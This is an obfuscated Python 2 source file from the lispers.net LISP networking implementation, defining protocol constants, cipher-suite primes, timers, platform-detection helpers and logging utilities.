if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" , "auth-failure" ]
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = 5
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 54 - 54: i1IIi + II111iiii
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 5 - 5: Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 46 - 46: IiII
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 45 - 45: ooOoO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
def lisp_record_traceback ( * args ) :
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
IIII1iII = open ( "./logs/lisp-traceback.log" , "a" )
IIII1iII . write ( "---------- Exception occurred: {} ----------\n" . format ( Oo0OO0000oooo ) )
try :
traceback . print_last ( file = IIII1iII )
except :
IIII1iII . write ( "traceback.print_last(file=fd) failed" )
if 28 - 28: i1IIi - iII111i
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 54 - 54: iII111i - O0 % OOooOOo
IIII1iII . close ( )
return
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
if ( oOoOOo0oo0 . find ( "command not found" ) != - 1 and lisp_on_docker ( ) ) :
o0O0Oo00Oo0o = bold ( "AWS check" , False )
lprint ( "{} - dmidecode not installed in docker container" . format ( o0O0Oo00Oo0o ) )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
return ( oOoOOo0oo0 . lower ( ) . find ( "amazon" ) != - 1 )
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
def lisp_on_gcp ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
return ( oOoOOo0oo0 . lower ( ) . find ( "google" ) != - 1 )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
def lisp_on_docker ( ) :
return ( os . path . exists ( "/.dockerenv" ) )
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
def lisp_process_logfile ( ) :
OOo00 = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( OOo00 ) ) : return
if 37 - 37: i1IIi
sys . stdout . close ( )
sys . stdout = open ( OOo00 , "a" )
if 46 - 46: OoOoOO00 - I11i - Ii1I . i1IIi
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
lisp_hostname = socket . gethostname ( )
ooo = lisp_hostname . find ( "." )
if ( ooo != - 1 ) : lisp_hostname = lisp_hostname [ 0 : ooo ]
return
if 94 - 94: OoOoOO00 - Oo0Ooo - I1IiiI % i1IIi
if 19 - 19: o0oOOo0O0Ooo
if 42 - 42: i1IIi . I1IiiI / i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
def lprint ( * args ) :
O0O0o0o0o = ( "force" in args )
if ( lisp_debug_logging == False and O0O0o0o0o == False ) : return
if 9 - 9: Oo0Ooo + OoOoOO00 - iIii1I11I1II1 - Ii1I + o0oOOo0O0Ooo
lisp_process_logfile ( )
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
print "{}: {}:" . format ( Oo0OO0000oooo , lisp_log_id ) ,
if 97 - 97: OOooOOo
for OO0OOooOO0 in args :
if ( OO0OOooOO0 == "force" ) : continue
print OO0OOooOO0 ,
if 31 - 31: I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
print ""
if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
try : sys . stdout . flush ( )
except : pass
return
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
def debug ( * args ) :
lisp_process_logfile ( )
if 63 - 63: I1ii11iIi11i
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
if 6 - 6: ooOoO0o / I1ii11iIi11i
print red ( ">>>" , False ) ,
print "{}:" . format ( Oo0OO0000oooo ) ,
for OO0OOooOO0 in args : print OO0OOooOO0 ,
print red ( "<<<\n" , False )
try : sys . stdout . flush ( )
except : pass
return
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if ( lisp_version == "" ) :
lisp_version = commands . getoutput ( "cat lisp-version.txt" )
if 53 - 53: Ii1I % Oo0Ooo
O0ooOo0o0Oo = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , O0ooOo0o0Oo ) )
return
if 71 - 71: iIii1I11I1II1 - OOooOOo . I1IiiI % OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
